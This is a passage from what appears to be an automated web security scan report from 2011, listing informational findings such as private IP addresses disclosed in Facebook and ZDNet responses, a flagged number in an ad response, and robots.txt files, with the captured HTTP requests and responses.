GET /plugins/like.php?action=recommend&api_key=361237392572&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df139df42fc%26origin%3Dhttp%253A%252F%252Fwww.courierpress.com%252Ff1fabc16a%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%3A%2F%2Fwww.courierpress.com%2Fnews%2F2011%2Fmay%2F12%2Fheder-here-in-this-spp-ppppp%2F&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=true&width=400 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2; lsd=qo83J

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.33.115
X-Cnection: close
Date: Thu, 12 May 2011 13:34:04 GMT
Elapsed: 0.044
Content-Length: 9684

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
17.70. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?api_key=116628718381794&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df2e4a56d24%26origin%3Dhttp%253A%252F%252Fmashable.com%252Ff7ed6dd3c%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fmashable.com%2F2011%2F05%2F11%2Fgoogle-chrome-notebooks%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.92.102
X-Cnection: close
Date: Thu, 12 May 2011 13:29:05 GMT
Content-Length: 9188

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
17.71. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=like&api_key=113003962065478&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df21ac7c568%26origin%3Dhttp%253A%252F%252Fwww.examiner.com%252Ff2d38411%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%3A%2F%2Fwww.examiner.com%2Ffight-sports-in-national%2Fcomplete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=false&width=150 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2; lsd=qo83J

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.48.121
X-Cnection: close
Date: Thu, 12 May 2011 13:33:38 GMT
Elapsed: 0.042
Content-Length: 10349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
17.72. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=like&api_key=113003962065478&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df17a2c4688%26origin%3Dhttp%253A%252F%252Fwww.examiner.com%252Ff2d38411%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%3A%2F%2Fwww.examiner.com%2Ffight-sports-in-national%2Fcomplete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds&layout=standard&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=false&width=360 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2; lsd=qo83J

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Powered-By: HPHP
X-FB-Server: 10.27.54.121
X-Cnection: close
Date: Thu, 12 May 2011 13:31:39 GMT
Content-Length: 11429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
17.73. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?id=94783579879&width=300&connections=0&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://crenk.com/buy-chromebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.51.122
X-Cnection: close
Date: Thu, 12 May 2011 13:29:53 GMT
Content-Length: 8996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
17.74. http://www.facebook.com/profile/pic.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /profile/pic.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /profile/pic.php?oid=AAAAAwAgACAAAAAPGpkM39yYlC_-UQcTRgxu115hCphFd69BTobv3zY9xZY7WP-WDuLyWDbPxFawXyrcSw4ffa4vChZeGBdrwOK57vjarYsCwdr9S1EjPNuHQuczIh9EfBu6C5gj_JnGO43L&size=square HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: image/jpeg
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=LF24m; path=/; domain=.facebook.com
X-FB-Server: 10.27.62.105
X-Cnection: close
Date: Thu, 12 May 2011 13:30:51 GMT
Content-Length: 393

GIF89a2.2....................................................................................................!.......,....2.2....`'.di.h..l.~p,.tm.x..|_...$.+....g.    ..1.I.@...u..\{.....-..G.&@...Y.M.
...[SNIP]...
17.75. http://www.facebook.com/profile/pic.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /profile/pic.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /profile/pic.php?oid=AAAAAwAgACAAAAAL53GcHR6uTH-CZ3M6GFpGc3GG-02m9Q1VnzjIIztdwyCLw9rI73AttDek7vHLWdTmFzTQ7AIMMndkONmZYSR5b5aDv-thlh1PLO9gYHpKZHN78MPr8c4CAX9_Rnj8m0ez&size=square HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: image/jpeg
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=colER; path=/; domain=.facebook.com
X-FB-Server: 10.27.97.114
X-Cnection: close
Date: Thu, 12 May 2011 13:32:18 GMT
Content-Length: 393

GIF89a2.2....................................................................................................!.......,....2.2....`'.di.h..l.~p,.tm.x..|_...$.+....g.    ..1.I.@...u..\{.....-..G.&@...Y.M.
...[SNIP]...
17.76. http://www.facebook.com/widgets/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /widgets/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /widgets/like.php?width=280&show_faces=1&layout=standard&href=http%3A%2F%2Fwww.imdb.com%2Ftitle%2Ftt0758746%2F HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/title/tt0758746/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2; lsd=LF24m

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.211.110
X-Cnection: close
Date: Thu, 12 May 2011 13:32:46 GMT
Content-Length: 7359

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
17.77. http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zdnet.com
Path:   /blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773 HTTP/1.1
Host: www.zdnet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:27:53 GMT
Server: Apache
Set-Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; expires=Fri, 11-May-2012 13:27:53 GMT; path=/; domain=.zdnet.com
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 108541

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
<!-- php client madison [r20100514-1345-c13VipDvarTagSvn]: 10.15.4.104 GET /html/BRAND=2/CELT=html/CID=207595/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=13616/CNET%2dPAGE%2dGUID=KAhF2QoPOkwAAF%2dl%40TMAAAA0/DVAR_TAG=Google+Inc.%3BProcessor%3BDarling%3BPity%3BCasualty/
...[SNIP]...
<!-- php client madison [r20100514-1345-c13VipDvarTagSvn]: 10.15.4.104 GET /html/BRAND=2/CELT=html/CID=207595/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=13616/CNET%2dPAGE%2dGUID=KAhF2QoPOkwAAF%2dl%40TMAAAA0/DVAR_TAG=Google+Inc.%3BProcessor%3BDarling%3BPity%3BCasualty/
...[SNIP]...
<!-- php client madison [r20100514-1345-c13VipDvarTagSvn]: 10.15.4.104 GET /html/BRAND=2/CELT=html/CID=207595/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=13616/CNET%2dPAGE%2dGUID=KAhF2QoPOkwAAF%2dl%40TMAAAA0/DVAR_TAG=Google+Inc.%3BProcessor%3BDarling%3BPity%3BCasualty/
...[SNIP]...
<!-- php client madison [r20100514-1345-c13VipDvarTagSvn]: 10.15.4.104 GET /html/BRAND=2/CELT=html/CID=207595/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=13616/CNET%2dPAGE%2dGUID=KAhF2QoPOkwAAF%2dl%40TMAAAA0/DVAR_TAG=Google+Inc.%3BProcessor%3BDarling%3BPity%3BCasualty/
...[SNIP]...
<!-- php client madison [r20100514-1345-c13VipDvarTagSvn]: 10.15.4.104 GET /html/BRAND=2/CELT=html/CID=207595/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=13616/CNET%2dPAGE%2dGUID=KAhF2QoPOkwAAF%2dl%40TMAAAA0/DVAR_TAG=Google+Inc.%3BProcessor%3BDarling%3BPity%3BCasualty/
...[SNIP]...
<!-- php client madison [r20100514-1345-c13VipDvarTagSvn]: 10.15.4.104 GET /html/BRAND=2/CELT=html/CID=207595/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=13616/CNET%2dPAGE%2dGUID=KAhF2QoPOkwAAF%2dl%40TMAAAA0/DVAR_TAG=Google+Inc.%3BProcessor%3BDarling%3BPity%3BCasualty/
...[SNIP]...
<!-- php client madison [r20100514-1345-c13VipDvarTagSvn]: 10.15.4.104 GET /html/BRAND=2/CELT=html/CID=207595/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=13616/CNET%2dPAGE%2dGUID=KAhF2QoPOkwAAF%2dl%40TMAAAA0/DVAR_TAG=Google+Inc.%3BProcessor%3BDarling%3BPity%3BCasualty/
...[SNIP]...
<!-- php client madison [r20100514-1345-c13VipDvarTagSvn]: 10.15.4.104 GET /html/BRAND=2/CELT=html/CID=207595/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=13616/CNET%2dPAGE%2dGUID=KAhF2QoPOkwAAF%2dl%40TMAAAA0/DVAR_TAG=Google+Inc.%3BProcessor%3BDarling%3BPity%3BCasualty/
...[SNIP]...
<!-- php client madison [r20100514-1345-c13VipDvarTagSvn]: 10.15.4.104 GET /html/BRAND=2/CELT=html/CID=207595/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=13616/CNET%2dPAGE%2dGUID=KAhF2QoPOkwAAF%2dl%40TMAAAA0/DVAR_TAG=Google+Inc.%3BProcessor%3BDarling%3BPity%3BCasualty/
...[SNIP]...
<!-- php client madison [r20100514-1345-c13VipDvarTagSvn]: 10.15.4.104 GET /html/BRAND=2/CELT=html/CID=207595/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=13616/CNET%2dPAGE%2dGUID=KAhF2QoPOkwAAF%2dl%40TMAAAA0/DVAR_TAG=Google+Inc.%3BProcessor%3BDarling%3BPity%3BCasualty/
...[SNIP]...
<!-- php client madison [r20100514-1345-c13VipDvarTagSvn]: 10.15.4.104 GET /html/BRAND=2/CELT=html/CID=207595/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=13616/CNET%2dPAGE%2dGUID=KAhF2QoPOkwAAF%2dl%40TMAAAA0/DVAR_TAG=Google+Inc.%3BProcessor%3BDarling%3BPity%3BCasualty/
...[SNIP]...
<!-- php client madison [r20100514-1345-c13VipDvarTagSvn]: 10.15.4.104 GET /html/BRAND=2/CELT=html/CID=207595/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=13616/CNET%2dPAGE%2dGUID=KAhF2QoPOkwAAF%2dl%40TMAAAA0/DVAR_TAG=Google+Inc.%3BProcessor%3BDarling%3BPity%3BCasualty/
...[SNIP]...
18. Credit card numbers disclosed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /N6514/adj/uk/uk-open

Issue detail

The following credit card number was disclosed in the response:

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.

Request

GET /N6514/adj/uk/uk-open;sz=300x250,336x280;tile=2;ord=3384793985? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.h-online.com/open/news/item/Google-s-Chrome-OS-machines-arrive-1242072.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 13:27:57 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14072

function googleAdSlot(id, contents) {this.id_ = id;this.contents_ = contents;this.loaded_ = false;}function addAdSenseContent(w, slot_id, content) {var params_map = w['google_slot_contents'] ||(w['goo
...[SNIP]...
ZXMtYXJyaXZlLTEyNDIwNzIuaHRtbOABAsACBMgCzpevFeACAOoCCjU0ODA3NzUwNjCQA-ADmAPIBqgDAegDrwLoA80F6AO2AugDuQL1AwAAAET1AyAAAADgBAE\x26num\x3d1\x26sig\x3dAGiWqtwBiihe7EM-d4dEmysNu-D4Pn00kw\x26client\x3dca-pub-4634662068732588\x26adurl\x3dhttp://clk.atdmt.com/MRT/go/272504400/direct/01/%3FWT.srch%3D1%26WT.mc_id%3D72B696F2-D9F3-4692-BCC1-499FCF8AC316%26CR_SCC%3D200010709\x22 id\x3daw0 onclick\x3d\x22ha(\x27aw0\x27)\x22 onfoc
...[SNIP]...
oaW5lcy1hcnJpdmUtMTI0MjA3Mi5odG1s4AECyALgv8sF4AIA6gIKNTQ4MDc3NTA2MJAD4AOYA8gGqAMB6AOvAugDzQXoA7YC6AO5AvUDAAAARPUDIAAAAOAEAQ\x26num\x3d2\x26sig\x3dAGiWqtzrutGUoeQF-3q-b5PAPeXlT98DYg\x26client\x3dca-pub-4634662068732588\x26adurl\x3dhttp://www.talend.com/download_form.php%3Fcont%3Detl%26utm_source%3Dgoogle%26utm_medium%3Dcpc%26utm_content%3DOS_DL_OSETL%26utm_campaign%3DG_ETL_NA_Content%26utm_term%3Dwww.h-online.com%26
...[SNIP]...
YXJyaXZlLTEyNDIwNzIuaHRtbOABAoACAcACBcgCqveQBOACAOoCCjU0ODA3NzUwNjCQA-ADmAPIBqgDAegDrwLoA80F6AO2AugDuQL1AwAAAET1AyAAAADgBAE\x26num\x3d3\x26sig\x3dAGiWqtw3dwGozc0_QjjwLjEDe7mAVxLtNA\x26client\x3dca-pub-4634662068732588\x26adurl\x3dhttp://www.moxiesoft.com/tal_products/knowledgebase.aspx%3Fac%3DPPC.G.\x22 id\x3daw2 onclick\x3d\x22ha(\x27aw2\x27)\x22 onfocus\x3d\x22ss(\x27\x27,\x27aw2\x27)\x22 onmousedown\x3d\x22st(\x
...[SNIP]...
2hpbmVzLWFycml2ZS0xMjQyMDcyLmh0bWzgAQKAAgHAAgHgAgDqAgo1NDgwNzc1MDYwkAPgA5gDyAaoAwHoA68C6APNBegDtgLoA7kC9QMAAABE9QMgAAAA4AQB\x26num\x3d4\x26sig\x3dAGiWqtz7RWFTpbDL9jNoux8ILfwonBdozg\x26client\x3dca-pub-4634662068732588\x26adurl\x3dhttp://www.digicert.com/ev-ssl-plus-packages.htm\x22 id\x3daw3 onclick\x3d\x22ha(\x27aw3\x27)\x22 onfocus\x3d\x22ss(\x27\x27,\x27aw3\x27)\x22 onmousedown\x3d\x22st(\x27aw3\x27)\x22 onmouse
...[SNIP]...
\x3dhttps://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.h-online.com/open/news/item/Google-s-Chrome-OS-machines-arrive-1242072.html%26hl%3Den%26client%3Dca-pub-4634662068732588%26adU%3Dwww.Microsoft.com/Cloud%26adT%3DWhat%2Bis%2BCloud%2BComputing%253F%26adU%3Dwww.Talend.com/Open_Source_ETL%26adT%3DDownload%2BOpen%2BSource%2BETL%26adU%3Dwww.Moxiesoft.com%26adT%3DKnowledge%2BB
...[SNIP]...
19. Robots.txt file  previous  next
There are 40 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

19.1. http://a.tribalfusion.com/displayAd.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /displayAd.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/plain
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /
19.2. http://ad-emea.doubleclick.net/N6514/adj/uk/uk-open  previous  next

Summary

Severity:   Information
Confidence:   Certain
